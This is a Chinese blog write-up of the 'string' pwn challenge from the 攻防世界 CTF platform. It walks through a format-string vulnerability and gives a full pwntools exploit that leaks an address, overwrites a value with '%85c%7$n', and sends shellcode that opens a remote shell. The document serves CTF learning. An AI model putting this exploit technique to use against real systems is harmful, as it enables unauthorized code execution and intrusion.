[攻防世界 pwn]——string(内涵peak小知识)

最新推荐文章于 2024-01-24 22:14:54 发布
最新推荐文章于 2024-01-24 22:14:54 发布
阅读量452 收藏 5
点赞数 1
分类专栏: # 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113856973
版权

[攻防世界 pwn]——string

peak小知识

mmap函数作用,mmap主要是将文件映射到一段内存去同时设置那段内存的属性可读可写或者是可执行详情请看mmap & mprotect

在checksec看到开启了canary和NX,应该和格式化字符串有关。
在这里插入图片描述
在IDA中看看,发现侧边栏竟然有mmap函数,这个地方应该是关键点,

在这里插入图片描述
找到函数位置,想要保证该函数执行,必须保证前两个函数执行完毕,并且a1 == a1[1], 跟前面找会发现a1其实就最开始的v3,而v3 = 68, v3[1] = 85。我们只要修改一个就好。

在这里插入图片描述
在这里插入图片描述

在下面我们发现了有格式化字符串的漏洞可以利用修改
在这里插入图片描述

下面就开始逐步书写exploit

  • 接受v3地址
from pwn import *
p = remote('111.200.241.244',57138)
p.recvuntil("secret[0] is ")
v3_0_addr = int(p.recvuntil("\n")[:-1], 16) 
log.info("v3_0_addr:" + hex(v3_0_addr))
  • 进入sub_4000D72()
p.recvuntil("character's name be:")
p.sendline("peak")
  • 进入sub_400A7D()并退出
p.recvuntil("east or up?:")
p.sendline("east")
  • 进入sub_400BB9()修改*v3并退出
p.recvuntil("there(1), or leave(0)?:")
p.sendline("1")
p.recvuntil("'Give me an address'")
p.sendline(str(v3_0_addr))
p.recvuntil("you wish is:")
p.sendline("%85c%7$n")
  • 进入sub_400CA6()输入shellcode 并执行
context(os='linux',arch='amd64')
shellcode = asm(shellcraft.sh()) 

p.recvuntil("USE YOU SPELL")
p.sendline(shellcode)
p.interactive()

exploit

from pwn import *
p = remote('111.200.241.244',57138)
p.recvuntil("secret[0] is ")
v3_0_addr = int(p.recvuntil("\n")[:-1], 16) 
log.info("v3_0_addr:" + hex(v3_0_addr))
 

p.recvuntil("character's name be:")
p.sendline("peak")

p.recvuntil("east or up?:")
p.sendline("east")
 
p.recvuntil("there(1), or leave(0)?:")
p.sendline("1")
p.recvuntil("'Give me an address'")
p.sendline(str(v3_0_addr))
p.recvuntil("you wish is:")
p.sendline("%85c%7$n")

context(os='linux',arch='amd64')
shellcode = asm(shellcraft.sh()) 

p.recvuntil("USE YOU SPELL")
p.sendline(shellcode)
p.interactive()
Y-peak
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界 新手区string
winterze的博客
04-04 324
0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/string' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 64位,开启了Canary和...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
攻防世界string
qq_25044201的博客
12-30 168
这道题是我在新手区见到的最难的一道题,涉及了格式化字符串,shellcode注入,最难的还是这个过程。繁杂,琐屑。 这句是最关键的,创建个内存然后作为指针函数。这里注入shellcode就可以。但是有个前提a[0]=a[1]我们要通过格式化字符串修改a[0]=85使得a[0]=a[1] ...
[PWN](攻防世界)string
ljh15937的博客
09-21 1177
分析程序漏洞 了解程序的基本信息 64位小端序 开启了 Canary 保护,栈不可执行,未开启 PIE, 使用 IDA Pro 进行静态分析,由于该程序的执行流较为复杂,需要花些时间理清程序的具体执行流程 使用 GDB 进行动态调试,设置断点执行到 printf(&format, &format);,可以发现输入的地址 0xa98ac7 在栈顶的第二个8字节,根据64位程序的传参方式,该地址是格式化字符串的第 7 个参数,printf() 函数的第 8 个参数。
攻防世界pwn——string
qq_62076255的博客
11-05 675
攻防世界pwn——string
攻防世界 pwn string
N1rvana的博客
11-15 3937
攻防世界string应该是新手区数一数二的难题,难点在理解程序流程。 先观察主函数: alarm函数 什么是alarm函数? 如上图所示,在做一些pwn题的时候,我们有时会遇到alarm(0x3Cu)函数。alarm函数中的参数0x3Cu是十六进制无符号数,即十进制对应60,所以该函数的作用是在程序运行60秒后,给进程发送SIGALRM信号,如果不另编写程序接受处理此信号,则默认结束此程序。 为什么要使用alarm函数? 一是比赛中常要远程连接服务器解题,官方不希望有队伍长时间解不出来题浪费服务器资源 二
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、return-to-libc攻击、get_flag函数、...
awd攻防比赛总结——3s_NwGeek.docx
09-30
AWD 攻防比赛总结 AWD 攻防比赛总结是关于一场线下的 AWD 攻防对抗赛的总结报告,报告作者 3s_NwGeek 分享了在比赛中的经验和心得。该报告主要集中在 Web 环境下的个人领悟到的技巧和心得。 首先,作者介绍了比赛...
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
攻防世界-string-Writeup
SkYe's Blog
05-15 492
string [collapse title=“展开查看详情” status=“false”] 考点:格式化字符串任意地址写小数 题目前面有几个条件循环绕过,反编译就能看出,不再赘述。看漏洞函数: unsigned __int64 sub_400BB9() { int v1; // [rsp+4h] [rbp-7Ch] __int64 v2; // [rsp+8h] [rbp-78h] char format; // [rsp+10h] [rbp-70h] unsigned __int64
攻防世界新手区—string
hanabi_sh
10-15 516
攻防世界string,格式化字符漏洞
攻防世界PWN-string
Deeeelete的博客
11-15 602
题目:string 进PE或者checksec 64位程序 堆栈不可执行以及栈保护 运行一遍好像是一个文字游戏 剧情游戏?分析一波主要任务分支: 情况1:开始游戏,啥也不输入,60秒之后程序自动关闭 情况2:开始游戏,输入名称,名称超过了12个字符,直接出局 情况3:开始游戏,输入小于12个字符的名称,进入剧情问我走east还是up,如果选择up程序会一直死循环 情况4:开始游戏,输入小于12个字符的名称,进入剧情走east,然后问我选择1还是0,选择0,原地暴毙 情况5:开始游
攻防世界 Pwn string
MrTreebook的博客
11-22 148
攻防世界pwn string1.checksec看一下保护2.IDA分析一下源码 1.checksec看一下保护 除了PIE其他保护都开了 2.IDA分析一下源码 v3申请了8大小的内存空间,然后在前4个空间中存放了数字68,在后四个空间中存放了数字85。而v4中存放的是v3的内容,并不是68和85两个数字,而是存放了两个数字的内存空间地址。 ...
pwn string
weixin_45677731的博客
03-13 609
题目来源:攻防世界 拿到题目后checksec 可以看到是64位的,拖到ida里看一下 有个v3=malloc(8ull) 这个函数查了一会儿,分配内存的,最后的结果就是v3前面放了68,后面放了85 点进sub_400d72这个函数看一下 可以看到这里有三个主要的函数,我们逐个分析 第一个 ...
攻防世界 - pwn - string
qq726232111的博客
03-25 497
A、程序分析 1、mov eax, ds:stdin@@GLIBC_2_0 mov [esp+8], eax ; stream mov dword ptr [esp+4], 64h ; n lea eax, [esp+9Ch+s] mov [esp], eax ; s call ...
菜狗的reverse学习——攻防世界no-strings-attached
weixin_61102112的博客
09-14 219
无壳直接扔到IDA观察 发现四个奇怪的函数 看导入表发现setlocale函数是自带的函数
pwn入门之mprotect函数的利用
最新发布
wangxunyu6的博客
01-24 1192
所以payload的意思就是先调用mprotect函数通过pop将原本的参数覆盖为我们想要的参数,然后返回到read函数,然后pop弹掉read的参数,把第二个参数改为bss的地址,读入shellcode。通过gadget找到一个含有三个pop一个ret指令的地址,我们要通过这个指令将mprotect函数原来的参数pop走,让我们能够填入我们想要的参数.pop_ebx_esi_ebp_ret=0x80a019b然后就是构造payload了先上代码。这题是64位的所以着重讲一下pay的构造。
攻防世界pwn类题中string
05-11
攻防世界Pwn类题目中,`string`通常是指一个用于存储字符串的字符数组或指针,是一个C语言中常见的数据类型。在Pwn类题目中,`string`往往是一个非常重要的数据结构,因为大多数漏洞都与字符串的处理有关。例如,`strcpy`和`strcat`等字符串处理函数容易导致缓冲区溢出漏洞,而使用`printf`函数时,如果格式字符串中包含了`%s`等字符串格式化符号,也容易导致格式化字符串漏洞。因此,在Pwn类题目中,正确地处理字符串是非常重要的。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值